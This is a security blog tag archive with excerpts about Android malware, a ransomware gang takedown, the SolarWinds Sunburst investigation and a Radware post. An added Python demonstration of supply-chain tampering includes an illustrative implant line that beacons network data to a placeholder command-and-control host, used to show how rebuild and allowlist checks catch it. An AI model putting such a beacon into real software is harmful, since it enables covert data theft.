Tag Archive for: story

Why I’ve switched from Android to iOS: A story of possible malware and why you can never be too careful


The price of freedom is (personal) vigilance. Image credit: Pexels/Towfiqu barbhuiya.

Editor’s note: This is a personal anecdote shared by a long-time HWZ writer and is not representative of the security postures afforded on any operating system. The writer has been a phone reviewer since the 2000s and has freelanced with HWZ since.

An unwilling switch from Android to iOS

I’ve been writing for HardwareZone for a while. I continued freelancing whenever I could, after moving on from my role to another career path back in the noughties. Those who know me and are reading this will say that I’ve been among the most ardent defenders of Android since I first laid hands on the HTC G1 Dream in 2008. 

While that early HWZ team was evenly divided between iOS and Android loyalists, I endured a lot of good-natured ribbing as one of Android’s loudest supporters. I would jump in to defend Google’s mobile OS at the slightest hint of debate. 

It helped that my colleagues were largely Android users in the roles I moved on to. Some even converted after a bout of “passionate” evangelism on my part.

Unfortunately, I can no longer express that enthusiasm for Android’s open-source ecosystem, as it was also my downfall. It led to a month of panic, frustration, and many missed deadlines.

(Editor’s note: Non-apology apology accepted.)

What prompted the change of heart? It’s probably malware and has been in the news lately.

Malware: never say never

What I never thought would happen to me, happened to me. Image credit: Pexels/Mikhail Nilov.

When I made my first public appearance with an iPhone 15 Pro Max earlier this month, there were exclamations of surprise and satisfaction from friends and family alike:

“You aren’t the real Count! What have they done to him!”

“Finally, you’ve come to your senses! Better late than never…”

Whether I had “come to my senses” is up for debate, but I knew for certain: I no longer felt safe using Android phones after losing hundreds of dollars in online transactions I did not know of, or approve of. 

As you’ve probably heard by now, there has been an exponentially growing number of scammers exploiting Android’s openness to third-party apps and accessibility…

Feel-good story of the week: 2 ransomware gangs meet their demise


A ransom note is plastered across a laptop monitor.

From the warm-and-fuzzy files comes this feel-good Friday post, chronicling this week’s takedown of two hated ransomware groups. One vanished on Tuesday, allegedly after being hacked by a group claiming allegiance to Ukraine. The other was taken out a day later thanks to an international police dragnet.

The first group, calling itself Trigona, saw the content on its dark web victim naming-and-shaming site pulled down and replaced with a banner proclaiming: “Trigona is gone! The servers of Trigona ransomware gang has been infiltrated and wiped out.” An outfit calling itself Ukrainian Cyber Alliance took credit and included the tagline: “disrupting Russian criminal enterprises (both public and private) since 2014.”

Poor operational security

A social media post from a user claiming to be a Ukrainian Cyber Alliance press secretary said his group targeted ransomware groups partly because they consider themselves out of reach of Western law enforcement.

“We just found one gang like that and did to them as they do to the rest,” the press secretary wrote. “Downloaded their servers (ten of them), deleted everything and defaced for the last time. TOR didn’t help them or even knowing they had a hole in it. Their entire infrastructure is completely blown away. Such a hunt forward.”

A separate social media post dumped what the press secretary said was an administrative panel key and said the group wiped out Trigona’s “landing, blog, leaks site, internal server (rocketchat, atlassian), wallets and dev servers.” The person also claimed that the Ukrainian Cyber Alliance hacked a Confluence server Trigona used.

Screenshot showing purported hacker’s control of Trigona Confluence server.

By Friday, the Trigona site was unavailable, as evidenced by the message “Onionsite not found.”

Trigona first surfaced in 2022 with close ties to the ransomware groups CryLock and BlackCat (the group also tracked as ALPHV). It primarily hacked companies in the US and India, followed by Israel, Turkey, Brazil, and Italy. It was known for compromising MySQL servers,…

SolarWinds: The Untold Story of the Boldest Supply-Chain Hack


But they had been at it only 24 hours when they found the passage they’d been looking for: a single file that appeared to be responsible for the rogue traffic. Carmakal believes it was December 11 when they found it.

The file was a .dll, or dynamic-link library—code components shared by other programs. This .dll was large, containing about 46,000 lines of code that performed more than 4,000 legitimate actions, and—as they found after analyzing it for an hour—one illegitimate one.

The main job of the .dll was to tell SolarWinds about a customer’s Orion usage. But the hackers had embedded malicious code that made it transmit intelligence about the victim’s network to their command server instead. Ballenthin dubbed the rogue code “Sunburst”—a play on SolarWinds. They were ecstatic about the discovery. But now they had to figure out how the intruders had snuck it into the Orion .dll.

This was far from trivial. The Orion .dll file was signed with a SolarWinds digital certificate, which was supposed to verify that the file was legitimate company code. One possibility was that the attackers had stolen the digital certificate, created a corrupt version of the Orion file, signed the file to make it look authentic, then installed the corrupt .dll on Mandiant’s server. Or, more alarmingly, they might have breached SolarWinds’ network and altered the legitimate Orion .dll source code before SolarWinds compiled it—converting the code into software—and signed it. The second scenario seemed so far-fetched that the Mandiant crew didn’t really consider it—until an investigator downloaded an Orion software update from the SolarWinds website. The backdoor was in it.

The implication was staggering. The Orion software suite had about 33,000 customers, some of whom had started receiving the hacked software update in March. That meant some customers might have been compromised for eight months already. The Mandiant team was facing a textbook example of a software-supply-chain attack—the nefarious alteration of trusted software at its source. In a single stroke, attackers can infect thousands, potentially millions, of machines.
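The practitioner’s caveat in the two scenarios above is that a valid signature only proves the bytes were signed by whoever held the key; it says nothing about whether the source was clean before the vendor’s own pipeline compiled and signed it. The following added example (not code from the Wired article, Mandiant, or SolarWinds) models both scenarios with a constructed, illustrative source tree and shows why a signature check alone cannot tell an honest release from either attack, while two checks the investigation relied on in spirit, an independent rebuild and a scan for unexpected network destinations, can. The host names, the allowlist, and the HMAC standing in for a code-signing certificate are all assumptions made for the example.

```python
import hashlib
import hmac
import re

# Constructed, illustrative "source tree" for a telemetry component like the one
# described above. These are not SolarWinds or Orion source lines; the host
# names and function names are placeholders.
CLEAN_SOURCE = [
    "def collect_usage(): return {'nodes': count_nodes(), 'version': VERSION}",
    "def report_usage(): send('telemetry.vendor.example', collect_usage())",
]
# The single illegitimate action an intruder slips in before the vendor builds.
IMPLANT_LINE = "def _beacon(): send('c2.attacker.example', enumerate_network())"

# Hosts the component is legitimately allowed to talk to (constructed allowlist).
ALLOWED_HOSTS = {"telemetry.vendor.example"}

# Stands in for the vendor's code-signing certificate. An HMAC is used here only
# so the example runs with the standard library; the point is identical for a
# real Authenticode/X.509 signature.
VENDOR_SIGNING_KEY = b"constructed-vendor-signing-key"


def build(source_lines):
    """Model the compile step: source lines in, shipped artifact bytes out."""
    return "\n".join(source_lines).encode()


def sign(artifact, key=VENDOR_SIGNING_KEY):
    """The vendor's release pipeline signs whatever it just built."""
    return hmac.new(key, artifact, hashlib.sha256).hexdigest()


def signature_valid(artifact, signature, key=VENDOR_SIGNING_KEY):
    """What a customer's installer checks: does the signature match the bytes?"""
    return hmac.compare_digest(sign(artifact, key), signature)


def release_clean():
    """Honest release: clean source, built and signed by the vendor."""
    artifact = build(CLEAN_SOURCE)
    return artifact, sign(artifact)


def release_tampered_in_source():
    """Second scenario above: source altered inside the vendor's network, then
    built and signed by the vendor's own unsuspecting pipeline."""
    artifact = build(CLEAN_SOURCE + [IMPLANT_LINE])
    return artifact, sign(artifact)


def release_tampered_with_stolen_key():
    """First scenario above: attacker patches the shipped binary and re-signs
    it with a stolen signing key."""
    artifact = build(CLEAN_SOURCE) + b"\n" + IMPLANT_LINE.encode()
    return artifact, sign(artifact)  # same key: it was stolen


def matches_independent_build(artifact, audited_source):
    """Reproducible-build check: rebuild from audited source, compare digests."""
    expected = hashlib.sha256(build(audited_source)).digest()
    return hmac.compare_digest(hashlib.sha256(artifact).digest(), expected)


def unexpected_destinations(artifact, allowed=ALLOWED_HOSTS):
    """Static triage in the spirit of the investigation: every network
    destination the artifact names that is not on the allowlist."""
    hosts = re.findall(r"send\('([^']+)'", artifact.decode(errors="replace"))
    return sorted(set(hosts) - set(allowed))


def assess(artifact, signature):
    """Combine the three checks; the signature alone passes in all three cases."""
    return {
        "signature_valid": signature_valid(artifact, signature),
        "matches_rebuild": matches_independent_build(artifact, CLEAN_SOURCE),
        "unexpected_destinations": unexpected_destinations(artifact),
    }


if __name__ == "__main__":
    for name, release in (("clean", release_clean),
                          ("tampered in source", release_tampered_in_source),
                          ("stolen key", release_tampered_with_stolen_key)):
        print(name, assess(*release()))
```

Running the block prints a valid signature for all three releases; only the rebuild comparison and the destination scan separate the honest build from the two attacks, which is why signed-update trust has to be backed by reproducible builds or behavioural analysis rather than certificate validity alone.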

In 2017 hackers had sabotaged a software supply…

Radware Customers Share Their Personal Ransomware Story


Just the word ransom lets you know that ransomware isn’t a welcome visitor. No industry is immune to it. In fact, many attacks on healthcare systems have prevented patients from getting medical care. Yes, it can be that evil.

This is a Security Bloggers Network syndicated blog from Radware Blog authored by Radware Customers. Read the original post at: https://blog.radware.com/all/customer-corner/2023/03/radware-customers-share-their-ransomware-story/
